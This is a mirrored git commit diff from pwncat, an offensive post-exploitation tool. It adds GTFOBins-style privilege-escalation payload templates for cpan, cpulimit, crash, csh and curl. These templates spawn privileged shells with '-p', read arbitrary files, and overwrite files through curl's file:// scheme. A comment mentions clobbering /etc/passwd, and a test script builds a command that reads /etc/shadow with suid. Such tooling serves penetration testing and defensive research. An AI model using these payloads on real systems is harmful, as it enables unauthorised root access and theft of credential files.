mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-27 19:04:15 +01:00
Merge branch 'master' of github.com:calebstewart/pwncat
This commit is contained in:
commit
c35e0ff8ec
@ -86,7 +86,7 @@
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
"type": "read",
|
"type": "read",
|
||||||
"stream": "print",
|
"stream": "raw",
|
||||||
"payload": "{command}",
|
"payload": "{command}",
|
||||||
"args": ["-c", "'{cat} {lfile}'"],
|
"args": ["-c", "'{cat} {lfile}'"],
|
||||||
"suid": ["-p"]
|
"suid": ["-p"]
|
||||||
@ -364,15 +364,129 @@
|
|||||||
"exit": "exit\n"
|
"exit": "exit\n"
|
||||||
}
|
}
|
||||||
|
|
||||||
// Could we do some file_read and file_write with this too..?
|
// Could we do some file_read and file_write with this too..? We can run cobol...
|
||||||
],
|
],
|
||||||
//-------------------------------------------------------------------
|
//-------------------------------------------------------------------
|
||||||
// "cpan": [
|
"cpan": [
|
||||||
// {
|
{
|
||||||
// "type": "shell",
|
"type": "shell",
|
||||||
// "payload": "{command}",
|
"payload": "{command}",
|
||||||
// "input" : "! exec {shell} -p\n",
|
"input" : "! system(\"{shell} -p\")\n",
|
||||||
// "exit": "exit\n"
|
// exit the shell, AND exit cpan
|
||||||
// }
|
"exit": "exit\nexit\n"
|
||||||
// ]
|
}
|
||||||
|
|
||||||
|
// Could we do some file_read and file_write with this too? We can run perl...
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"cpulimit": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-l", "100", "-f", "\"{shell}\""],
|
||||||
|
// exit the shell, AND exit cpan
|
||||||
|
"exit": "exit\n"
|
||||||
|
}
|
||||||
|
// We cannot seem to pass other arguments to process ran, so no read/write (???)
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"crash": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-h"],
|
||||||
|
"input": "!{shell} -p\n",
|
||||||
|
// exit the shell, AND exit cpan
|
||||||
|
"exit": "exit\nq\n"
|
||||||
|
}
|
||||||
|
// We cannot seem to pass other arguments to process ran, so no read/write (???)
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"csh": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"suid": ["-b"],
|
||||||
|
"input": "{shell} -p\n",
|
||||||
|
// exit the shell, AND exit csh
|
||||||
|
"exit": "exit\nexit\n"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command}",
|
||||||
|
// "suid" is not supplied because it must be very last argument
|
||||||
|
"args": ["-c", "\"{cat} {lfile}\"", "-b"]
|
||||||
|
}
|
||||||
|
// Using write, it doesn't get the entire text to clobber /etc/passwd
|
||||||
|
// {
|
||||||
|
// "type": "write",
|
||||||
|
// "stream": "base64",
|
||||||
|
// "payload": "{command}",
|
||||||
|
// "args": ["-c", "\"{base64} -d > {lfile}\"", "-b"],
|
||||||
|
// // "suid" is not supplied because it must be very last argument
|
||||||
|
// "exit": "{ctrl_d}"
|
||||||
|
// }
|
||||||
|
],
|
||||||
|
"bsd-csh": [
|
||||||
|
{
|
||||||
|
"type": "shell",
|
||||||
|
"payload": "{command}",
|
||||||
|
"input": "{shell} -p\n",
|
||||||
|
"suid": ["-b"],
|
||||||
|
// exit the shell, AND exit csh
|
||||||
|
"exit": "exit\nexit\n"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "print",
|
||||||
|
"payload": "{command}",
|
||||||
|
// "suid" is not supplied because it must be very last argument
|
||||||
|
"args": ["-c", "\"{cat} {lfile}\"", "-b"]
|
||||||
|
}
|
||||||
|
// Using write, it doesn't get the entire text to clobber /etc/passwd
|
||||||
|
// {
|
||||||
|
// "type": "write",
|
||||||
|
// "stream": "base64",
|
||||||
|
// "payload": "{command}",
|
||||||
|
// "args": ["-c", "\"{base64} -d > {lfile}\"", "-b"],
|
||||||
|
// // "suid" is not supplied because it must be very last argument
|
||||||
|
// "exit": "{ctrl_d}"
|
||||||
|
// }
|
||||||
|
],
|
||||||
|
//-------------------------------------------------------------------
|
||||||
|
"curl": [
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "raw",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-s", "file://{lfile} --output -"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "read",
|
||||||
|
"stream": "base64",
|
||||||
|
"payload": "{command}",
|
||||||
|
"args": ["-s", "file://{lfile} --output - | {base64} -w 0"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "write",
|
||||||
|
"stream": "print",
|
||||||
|
// This is weird because under the case where we are running w/ sudo,
|
||||||
|
// we need to ask for the password first. The first "{command}" will
|
||||||
|
// ask for the sudo password, then fail. The second "{command}"
|
||||||
|
// will not ask for the sudo password, and then the copy will succeed.
|
||||||
|
// Without sudo, the first command will simply fail, and the second
|
||||||
|
// will succeed. This is the same for the other payload below.
|
||||||
|
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {cat} > $TF; {command}; rm -f $TF",
|
||||||
|
"args": ["-s", "file://$TF --output {lfile}"],
|
||||||
|
"exit": "{ctrl_d}"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "write",
|
||||||
|
"stream": "base64",
|
||||||
|
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
|
||||||
|
"args": ["-s", "file://$TF --output {lfile}"],
|
||||||
|
"exit": "{ctrl_d}"
|
||||||
|
}
|
||||||
|
]
|
||||||
}
|
}
|
@ -1 +1 @@
|
|||||||
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+VJVsigrS5KE58trqdBdMuGVREI7EnHmrZEOExackIFDwolUiOvV33DA2cBVBVzEF6dF8ARd9875P6LtPveJXzXSFu7oxfoHwwnIaOb1Jkal4JkDTVXePIRupZhXT6bfKd3Zewx1ZbQi0pRZnrbe6ardrGFw6YZvrWRZAG9rGfQCI7GjMRz5+mMDA0oKzhBDuemkL/wElJE30Ky3jWWMRT4deK5t1ds940t3/r2pqodHA+n4NA0JxEyPH7c6nXXsCD6KZIYcqwrBSBvlRYQ1rp6BpSqoetqifAF3slUcdam+F1RLmnNu+qL0a1H7cZoM4t5dvWJf1x7AFuGma2YKBMq5nGMG1zfphBAMyMV4LiEmFJp6dZkT9wKG8tpuH8Wc14K68ClZroGQLTUeu6uwhTceKcXHJ7XXy1RRkRiNqz+9YzBEXybstHmQn0NXHlk7Ni3I/XORWcsxwZjJGOrXJ/ipnpEW009KU0VmRP0sOrdMl9iCUZUlatCDcKEDWDuE= caleb@stewie-xps
|
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+VJVsigrS5KE58trqdBdMuGVREI7EnHmrZEOExackIFDwolUiOvV33DA2cBVBVzEF6dF8ARd9875P6LtPveJXzXSFu7oxfoHwwnIaOb1Jkal4JkDTVXePIRupZhXT6bfKd3Zewx1ZbQi0pRZnrbe6ardrGFw6YZvrWRZAG9rGfQCI7GjMRz5+mMDA0oKzhBDuemkL/wElJE30Ky3jWWMRT4deK5t1ds940t3/r2pqodHA+n4NA0JxEyPH7c6nXXsCD6KZIYcqwrBSBvlRYQ1rp6BpSqoetqifAF3slUcdam+F1RLmnNu+qL0a1H7cZoM4t5dvWJf1x7AFuGma2YKBMq5nGMG1zfphBAMyMV4LiEmFJp6dZkT9wKG8tpuH8Wc14K68ClZroGQLTUeu6uwhTceKcXHJ7XXy1RRkRiNqz+9YzBEXybstHmQn0NXHlk7Ni3I/XORWcsxwZjJGOrXJ/ipnpEW009KU0VmRP0sOrdMl9iCUZUlatCDcKEDWDuE= pwncat@pwncat
|
||||||
|
@ -17,8 +17,10 @@ def which(path: str, quote=False):
|
|||||||
gtfo = GTFOBins("data/gtfobins.json", which)
|
gtfo = GTFOBins("data/gtfobins.json", which)
|
||||||
|
|
||||||
|
|
||||||
binary_to_test = "cpan"
|
binary_to_test = "curl"
|
||||||
capabilities_to_test = Capability.SHELL
|
# capabilities_to_test = Capability.SHELL
|
||||||
|
capabilities_to_test = Capability.WRITE
|
||||||
|
# capabilities_to_test = Capability.WRITE
|
||||||
our_shell = "/bin/bash"
|
our_shell = "/bin/bash"
|
||||||
|
|
||||||
binary = gtfo.find_binary(binary_to_test)
|
binary = gtfo.find_binary(binary_to_test)
|
||||||
@ -30,8 +32,8 @@ methods = binary.iter_methods(
|
|||||||
)
|
)
|
||||||
for method in methods:
|
for method in methods:
|
||||||
# print(method)
|
# print(method)
|
||||||
print(method.build(shell=our_shell)[0])
|
# print(method.build(shell=our_shell, suid=True))
|
||||||
# print(method.build(lfile="/etc/shadow")[0])
|
print(method.build(lfile="/etc/shadow", suid=True)[0])
|
||||||
# print(method.build(lfile="/tmp/test", data="hello")[0])
|
# print(method.build(lfile="/tmp/test", data="hello")[0])
|
||||||
|
|
||||||
# all_binaries = list(gtfo.iter_methods(Capability.SHELL))
|
# all_binaries = list(gtfo.iter_methods(Capability.SHELL))
|
||||||
|
Loading…
Reference in New Issue
Block a user